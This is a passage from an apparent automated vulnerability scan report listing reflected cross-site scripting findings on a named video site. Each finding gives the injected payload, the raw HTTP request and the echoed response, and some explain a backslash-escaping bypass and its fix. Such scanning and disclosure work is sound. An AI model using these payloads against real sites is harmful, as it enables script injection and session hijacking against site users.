The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb502"style%3d"x%3aexpression(alert(1))"b653ff4a1e was submitted in the REST URL parameter 2. This input was echoed as fb502"style="x:expression(alert(1))"b653ff4a1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/comedyfb502"style%3d"x%3aexpression(alert(1))"b653ff4a1e/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=f0ece63628c3fac5aff7128c8fb96092; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f0ece63628c3fac5aff7128c8fb96092; path=/; httponly
Set-Cookie: f0ece63628c3fac5aff7128c8fb96092=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A30%3A%22inappropriate-game-show-answer%22%3Bs%3A8%3A%22video_id%22%3Bi%3A675517346001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22675517346001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedyfb502stylexexpressionalert1b653ff4a1e/tv-bloopers/88729112001" title="Comedyfb502"style="x:expression(alert(1))"b653ff4a1e" id="crumb_section">
...[SNIP]...

2.57. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8ce5\'%3bac2303b862d was submitted in the REST URL parameter 2. This input was echoed as a8ce5\\';ac2303b862d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedya8ce5\'%3bac2303b862d/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:55 GMT
Server: Apache
Set-Cookie: PHPSESSID=2a06cee1fed1891cd6c666018184efa9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2a06cee1fed1891cd6c666018184efa9; path=/; httponly
Set-Cookie: 2a06cee1fed1891cd6c666018184efa9=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A30%3A%22inappropriate-game-show-answer%22%3Bs%3A8%3A%22video_id%22%3Bi%3A675517346001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22675517346001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedya8ce5\\';ac2303b862d'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Inappropriate Game Show Answer'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   thi
...[SNIP]...

2.58. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24875<img%20src%3da%20onerror%3dalert(1)>653fb89e991 was submitted in the REST URL parameter 2. This input was echoed as 24875<img src=a onerror=alert(1)>653fb89e991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy24875<img%20src%3da%20onerror%3dalert(1)>653fb89e991/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=16cee63c37aa96fdba489f95b3df185b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=16cee63c37aa96fdba489f95b3df185b; path=/; httponly
Set-Cookie: 16cee63c37aa96fdba489f95b3df185b=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A30%3A%22inappropriate-game-show-answer%22%3Bs%3A8%3A%22video_id%22%3Bi%3A675517346001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22675517346001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>653fb89e991" id="crumb_section">Comedy24875<img src=a onerror=alert(1)>653fb89e991</a>
...[SNIP]...

2.59. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b70"><img%20src%3da%20onerror%3dalert(1)>f5a005404a0 was submitted in the REST URL parameter 3. This input was echoed as 79b70"><img src=a onerror=alert(1)>f5a005404a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopers79b70"><img%20src%3da%20onerror%3dalert(1)>f5a005404a0/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:06 GMT
Server: Apache
Set-Cookie: PHPSESSID=000e2fb5ca731da9a9c30f019e06a827; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=000e2fb5ca731da9a9c30f019e06a827; path=/; httponly
Set-Cookie: 000e2fb5ca731da9a9c30f019e06a827=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A30%3A%22inappropriate-game-show-answer%22%3Bs%3A8%3A%22video_id%22%3Bi%3A675517346001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22675517346001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopers79b70"><img src=a onerror=alert(1)>f5a005404a0/88729112001/page/2">
...[SNIP]...

2.60. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab8a9\'%3bfcea6025d4d was submitted in the REST URL parameter 2. This input was echoed as ab8a9\\';fcea6025d4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedyab8a9\'%3bfcea6025d4d/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=8a8f6da37fb39616aefc85ad64a0eb25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8a8f6da37fb39616aefc85ad64a0eb25; path=/; httponly
Set-Cookie: 8a8f6da37fb39616aefc85ad64a0eb25=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22millionaire-computer-crash%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35606096001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235606096001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedyab8a9\\';fcea6025d4d'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = '\'Millionaire\' Computer Crash'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   thi
...[SNIP]...

2.61. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0220"><img%20src%3da%20onerror%3dalert(1)>7a0cfe50ad7 was submitted in the REST URL parameter 2. This input was echoed as d0220"><img src=a onerror=alert(1)>7a0cfe50ad7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedyd0220"><img%20src%3da%20onerror%3dalert(1)>7a0cfe50ad7/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:35 GMT
Server: Apache
Set-Cookie: PHPSESSID=b8a22a0af6aa0b83f751715545fb5ba2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b8a22a0af6aa0b83f751715545fb5ba2; path=/; httponly
Set-Cookie: b8a22a0af6aa0b83f751715545fb5ba2=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22millionaire-computer-crash%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35606096001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235606096001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedyd0220gtltimg-srca-onerroralert1gt7a0cfe50ad7/tv-bloopers/88729112001" title="Comedyd0220"><img src=a onerror=alert(1)>7a0cfe50ad7" id="crumb_section">
...[SNIP]...

2.62. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee6c"><img%20src%3da%20onerror%3dalert(1)>caaa4866215 was submitted in the REST URL parameter 3. This input was echoed as bee6c"><img src=a onerror=alert(1)>caaa4866215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopersbee6c"><img%20src%3da%20onerror%3dalert(1)>caaa4866215/88729112001/millionaire-computer-crash/35606096001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=e04d9c3929f6ea798a4d3ec7afaa4982; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e04d9c3929f6ea798a4d3ec7afaa4982; path=/; httponly
Set-Cookie: e04d9c3929f6ea798a4d3ec7afaa4982=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A26%3A%22millionaire-computer-crash%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35606096001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235606096001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopersbee6c"><img src=a onerror=alert(1)>caaa4866215/88729112001/page/2">
...[SNIP]...

2.63. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83d43\'%3baf4b951ad79 was submitted in the REST URL parameter 2. This input was echoed as 83d43\\';af4b951ad79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedy83d43\'%3baf4b951ad79/tv-bloopers/88729112001/price-is-right-moron/11860998001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=3d1b8c7b06770cd49c994b494226782f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=3d1b8c7b06770cd49c994b494226782f; path=/; httponly
Set-Cookie: 3d1b8c7b06770cd49c994b494226782f=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A20%3A%22price-is-right-moron%22%3Bs%3A8%3A%22video_id%22%3Bi%3A11860998001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2211860998001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedy83d43\\';af4b951ad79'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Price is Right Moron'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this.sectionL
...[SNIP]...

2.64. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21465"><img%20src%3da%20onerror%3dalert(1)>254cc953763 was submitted in the REST URL parameter 2. This input was echoed as 21465"><img src=a onerror=alert(1)>254cc953763 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy21465"><img%20src%3da%20onerror%3dalert(1)>254cc953763/tv-bloopers/88729112001/price-is-right-moron/11860998001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:07 GMT
Server: Apache
Set-Cookie: PHPSESSID=d96df04d114448a53eee962c8160f5a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d96df04d114448a53eee962c8160f5a9; path=/; httponly
Set-Cookie: d96df04d114448a53eee962c8160f5a9=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A20%3A%22price-is-right-moron%22%3Bs%3A8%3A%22video_id%22%3Bi%3A11860998001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2211860998001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy21465gtltimg-srca-onerroralert1gt254cc953763/tv-bloopers/88729112001" title="Comedy21465"><img src=a onerror=alert(1)>254cc953763" id="crumb_section">
...[SNIP]...

2.65. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82aa8<img%20src%3da%20onerror%3dalert(1)>74109a378e1 was submitted in the REST URL parameter 2. This input was echoed as 82aa8<img src=a onerror=alert(1)>74109a378e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy82aa8<img%20src%3da%20onerror%3dalert(1)>74109a378e1/tv-bloopers/88729112001/price-is-right-moron/11860998001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:20 GMT
Server: Apache
Set-Cookie: PHPSESSID=9415095f7eb39c88826960560cc183e3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=9415095f7eb39c88826960560cc183e3; path=/; httponly
Set-Cookie: 9415095f7eb39c88826960560cc183e3=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A20%3A%22price-is-right-moron%22%3Bs%3A8%3A%22video_id%22%3Bi%3A11860998001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2211860998001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>74109a378e1" id="crumb_section">Comedy82aa8<img src=a onerror=alert(1)>74109a378e1</a>
...[SNIP]...

2.66. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97015"><img%20src%3da%20onerror%3dalert(1)>56e41c13320 was submitted in the REST URL parameter 3. This input was echoed as 97015"><img src=a onerror=alert(1)>56e41c13320 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopers97015"><img%20src%3da%20onerror%3dalert(1)>56e41c13320/88729112001/price-is-right-moron/11860998001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=9d650511fd7b96f4a17041e59e63258c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=9d650511fd7b96f4a17041e59e63258c; path=/; httponly
Set-Cookie: 9d650511fd7b96f4a17041e59e63258c=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A20%3A%22price-is-right-moron%22%3Bs%3A8%3A%22video_id%22%3Bi%3A11860998001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2211860998001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopers97015"><img src=a onerror=alert(1)>56e41c13320/88729112001/page/2">
...[SNIP]...

2.67. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
